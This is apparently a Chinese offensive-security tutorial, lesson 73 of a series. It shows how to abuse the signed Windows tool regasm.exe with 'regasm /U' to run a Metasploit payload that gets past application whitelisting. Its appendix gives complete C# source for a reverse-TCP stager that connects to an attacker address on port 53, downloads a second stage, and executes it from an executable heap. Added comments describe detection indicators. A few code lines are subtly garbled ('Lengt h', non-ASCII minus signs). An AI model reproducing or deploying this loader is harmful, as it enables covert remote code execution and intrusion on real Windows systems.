# 第七十三课：基于白名单Regasm.exe执行payload第三季

## Regasm简介：

Regasm 为程序集注册工具，读取程序集中的元数据，并将所需的项添加到注册表中。RegAsm.exe是Microsoft Corporation开发的合法文件进程。它与Microsoft.NET Assembly Registration Utility相关联。

**说明：** Regasm.exe所在路径没有被系统添加到PATH环境变量中，因此，REGASM命令无法直接识别。

具体参考微软官方文档：\
<https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool>

基于白名单Regasm.exe配置payload：

Windows 7 默认位置：

```bash
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
```

**攻击机：** 192.168.1.4 Debian\
**靶机：** 192.168.1.3 Windows 7

## 配置攻击机msf：

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPECCqScdK4OfaTopK%2F314cbd2bd9ab4f06f2323a2cd8c0d624.jpg?generation=1551066073828797\&alt=media)

## 靶机执行：

```bash
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U Micropoor.dll
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXjML3_FcKKksF7yox%2F-LZPECCtsZmqnpfnmTs8%2F868577dc3b5b517840363527f5b5ad2b.jpg?generation=1551066067812461\&alt=media)

## 附录：Micropoor.cs

**注：x86 payload**

```csharp
using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;

// Appendix listing for the tutorial above. This is not a real COM server: the
// ServicedComponent subclass exists only so that regasm.exe (a Microsoft-signed
// binary) calls the [ComRegisterFunction]/[ComUnregisterFunction] hooks, which
// in turn run the reverse-TCP stager in ZApOAKJKY. From a detection standpoint
// the observable chain is: regasm.exe loading a non-Microsoft .NET DLL, then
// that same process opening an outbound TCP connection and creating an
// executable heap (see the comments on each step below).
namespace HYlDKsYF

{

// COM-registration shim. Both hooks call the same stager entry point, so the
// code runs whether the DLL is registered or unregistered (`/U` on this page).
public class kxKhdVzWQXolmmF : ServicedComponent { 

// Only writes a fixed marker string; a usable string indicator for the binary.
public kxKhdVzWQXolmmF() { Console.WriteLine("doge"); } 

// Invoked by regasm.exe when registering the assembly.
[ComRegisterFunction]

public static void RegisterClass ( string pNNHrTZzW )

{

ZApOAKJKY.QYJOTklTwn();

} 

// Invoked by regasm.exe when unregistering the assembly (regasm /U).
[ComUnregisterFunction]

public static void UnRegisterClass ( string pNNHrTZzW )

{

ZApOAKJKY.QYJOTklTwn();

}

} 

// Stager: fetches a second-stage blob over TCP and executes it in-process.
// The kernel32 imports below are the loader primitives. HeapCreate is called
// with 0x00040000 (HEAP_CREATE_ENABLE_EXECUTE), i.e. the heap is created
// executable so the received bytes can run directly; a managed process that
// creates an executable heap and then starts a thread at a heap address is a
// well-known loader signature for EDR/ETW-based detection.
public class ZApOAKJKY

{ [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 FJyyNB, UInt32 fwtsYaiizj, UInt32 dHJhaXQiaqW);

[DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 bqtaDNfVCzVox, UInt32 hjDFdZuT, UInt32 JAVAYBFdojxsgo);

[DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 AQdEyOhn, byte[] wknmfaRmoElGo, UInt32 yRXPRezIkcorSOo);

[DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 uQgiOlrrBaR, UInt32 BxkWKqEKnp, UInt32 lelfRubuprxr, IntPtr qPzVKjdiF, UInt32 kNXJcS, ref UInt32 atiLJcRPnhfyGvp);

// The last import shares a line with the start of the download routine.
// HMSjEXjuIzkkmo(host, port): opens a TCP connection to host:port, reads a
// 4-byte length prefix (platform byte order via BitConverter), then reads that
// many bytes into a buffer starting at offset 5. Bytes 0..4 are afterwards
// filled with 0xBF followed by the socket handle - presumably so the stage can
// reuse the already-open connection, which means the same TCP session carries
// all follow-on traffic (one long-lived session, not a fresh callback).
// Returns null only if the connect fails.
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr XSjyzoKzGmuIOcD, UInt32 VumUGj);static byte[] HMSjEXjuIzkkmo(string aCWWUttzmy, int iJGvqiEDGLhjr) {

IPEndPoint YUXVAnzAurxH = new IPEndPoint(IPAddress.Parse(aCWWUttzmy), iJGvqiEDGLhjr);

Socket MXCEuiuRIWgOYze = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);

// Connection failure is the only handled error path; everything after assumes success.
try { MXCEuiuRIWgOYze.Connect(YUXVAnzAurxH); }

catch { return null;}

// Length prefix of the stage.
byte[] Bjpvhc = new byte[4];

MXCEuiuRIWgOYze.Receive(Bjpvhc, 4, 0);

int IETFBI = BitConverter.ToInt32(Bjpvhc, 0);

// Five spare bytes at the front are reserved for the prefix written below.
byte[] ZKSAAFwxgSDnTW = new byte[IETFBI + 5];

int JFPJLlk = 0;

// Receive the stage in chunks of at most 4096 bytes, offset by the 5-byte header.
while (JFPJLlk < IETFBI)

{ JFPJLlk += MXCEuiuRIWgOYze.Receive(ZKSAAFwxgSDnTW, JFPJLlk + 5, (IETFBI ‐ JFPJLlk) < 4096 ? (IETFBI ‐ JFPJLlk) : 4096, 0);}

// Prefix: 0xBF at offset 0, then the 4-byte socket handle at offsets 1..4.
byte[] nXRztzNVwPavq = BitConverter.GetBytes((int)MXCEuiuRIWgOYze.Handle);

Array.Copy(nXRztzNVwPavq, 0, ZKSAAFwxgSDnTW, 1, 4); ZKSAAFwxgSDnTW[0] = 0xBF;

return ZKSAAFwxgSDnTW;}

// Loader: copies the buffer into an executable heap and runs it on a new
// thread, then blocks with INFINITE (0xFFFFFFFF). regasm.exe therefore stays
// alive as the host process for as long as the stage runs; a long-lived
// regasm.exe holding an open socket is itself an anomaly worth alerting on.
static void TOdKEwPYRUgJly(byte[] KNCtlJWAmlqJ) {

if (KNCtlJWAmlqJ != null) {

// 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE.
UInt32 uuKxFZFwog = HeapCreate(0x00040000, (UInt32)KNCtlJWAmlqJ.Lengt h, 0);

// 0x00000008 = HEAP_ZERO_MEMORY.
UInt32 sDPjIMhJIOAlwn = HeapAlloc(uuKxFZFwog, 0x00000008, (UInt32)KNCtlJWAmlqJ.Length);

RtlMoveMemory(sDPjIMhJIOAlwn, KNCtlJWAmlqJ, (UInt32)KNCtlJWAmlqJ.Length);

UInt32 ijifOEfllRl = 0;

// The thread start address is the heap allocation itself.
IntPtr ihXuoEirmz = CreateThread(0, 0, sDPjIMhJIOAlwn, IntPtr.Zero, 0, ref ijifOEfllRl);

WaitForSingleObject(ihXuoEirmz, 0xFFFFFFFF);}} 

// Entry point reached from both COM hooks. Handler address and port are
// hard-coded (192.168.1.4:53, the attacker host listed above). TCP/53 to a
// non-DNS server from regasm.exe is a straightforward egress-filter and
// proxy-log indicator, independent of the payload bytes.
public static void QYJOTklTwn() {

byte[] ZKSAAFwxgSDnTW = null; ZKSAAFwxgSDnTW = HMSjEXjuIzkkmo("192.168.1.4", 53);

TOdKEwPYRUgJly(ZKSAAFwxgSDnTW);

} } }
```

> Micropoor


